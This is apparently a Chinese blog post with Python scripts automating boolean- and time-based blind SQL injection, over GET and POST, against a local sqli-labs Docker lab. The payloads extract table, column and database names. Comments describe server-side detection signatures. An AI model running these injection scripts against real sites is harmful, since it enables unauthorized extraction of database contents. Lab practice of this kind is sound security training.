环境搭建
docker pull acgpiano/sqli-labs
docker run -itd --name sqli -p 9080:80 --rm acgpiano/sqli-labs
GET型布尔盲注
import requests

# Boolean-based blind injection exercise against the local sqli-labs
# container (Less-1). One GET per (string position, candidate ASCII code);
# the response is read as a true/false oracle by looking for the normal
# "Dumb" login banner. With 94 candidates per position and up to 49
# positions, the lab's access log shows a burst of several thousand
# near-identical requests whose id parameter carries an
# information_schema lookup — that burst is the detection signature.
LAB_ENDPOINT = 'http://192.168.234.193:9080/Less-1/?id=1'
TRUE_MARKER = 'Your Login name:Dumb'

for position in range(1, 50):
    for code in range(33, 127):
        # Injected condition: compare the ASCII value of one character of
        # the concatenated column list with the current candidate.
        condition = f"'%20and%20ascii(substr((select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name='users'),{position},1))={code}--+"
        page = requests.get(url=LAB_ENDPOINT + condition).text
        if TRUE_MARKER in page:
            print(chr(code), end='')
GET型时间盲注
import requests,time

# Time-based blind injection exercise against the local sqli-labs
# container (Less-9). The oracle is latency: the injected if() calls
# sleep(1) when the guess is right, and the script treats any round trip
# longer than one second as a hit. NOTE: an unrelated network stall on a
# wrong guess is also counted as a hit, so output can contain spurious
# characters. On the server side this traffic shows up as thousands of
# GETs containing sleep( with a one-second response time on the matches.
LAB_ENDPOINT = 'http://192.168.234.193:9080/Less-9/?id=1'
DELAY_THRESHOLD = 1

for position in range(1, 50):
    for code in range(33, 127):
        condition = f"'%20and%20if(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),{position},1))={code},sleep(1),1)--+"
        started = time.time()
        requests.get(url=LAB_ENDPOINT + condition).text
        elapsed = time.time() - started
        if elapsed > DELAY_THRESHOLD:
            print(chr(code), end='')
POST型布尔盲注
import requests

# Boolean-based blind injection exercise against the local sqli-labs
# container (Less-15, POST login form). The injected condition travels
# in the uname field; the page is read as "true" when it contains the
# string "flag". Note the candidate range starts at 32 here (space is
# included), unlike the GET variant. A defender sees a burst of POSTs to
# /Less-15/ with a fixed passwd and an information_schema query in uname.
LAB_ENDPOINT = 'http://192.168.234.193:9080/Less-15/'
TRUE_MARKER = "flag"

for position in range(1, 50):
    for code in range(32, 127):
        form = {
            'uname': f"'or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{position},1))={code}#",
            'passwd': 'adminpass',
            'submit': 'Submit',
        }
        page = requests.post(url=LAB_ENDPOINT, data=form).text
        if TRUE_MARKER in page:
            print(chr(code), end='')
POST型时间盲注
import requests,time

# Time-based blind injection exercise against the local sqli-labs
# container (Less-15, POST login form). Only positions 1..8 of the
# database name are probed; a guess is accepted when the round trip
# exceeds one second, which is the sleep(1) inside the injected if().
# NOTE: as with the GET variant, a slow but wrong guess is indistinguishable
# from a hit. Server-side signature: repeated POSTs whose uname field
# contains sleep(.
LAB_ENDPOINT = 'http://192.168.234.193:9080/Less-15/'
DELAY_THRESHOLD = 1

for position in range(1, 9):
    for code in range(32, 127):
        form = {
            'uname': f"'or if(ascii(substr(database(),{position},1))={code},sleep(1),1)#",
            'passwd': 'adminpass',
            'submit': 'Submit',
        }
        started = time.time()
        requests.post(url=LAB_ENDPOINT, data=form).text
        elapsed = time.time() - started
        if elapsed > DELAY_THRESHOLD:
            print(chr(code), end='')
原文始发于微信公众号(飞奔的狸花猫):记一次使用Python编写多类型盲注脚本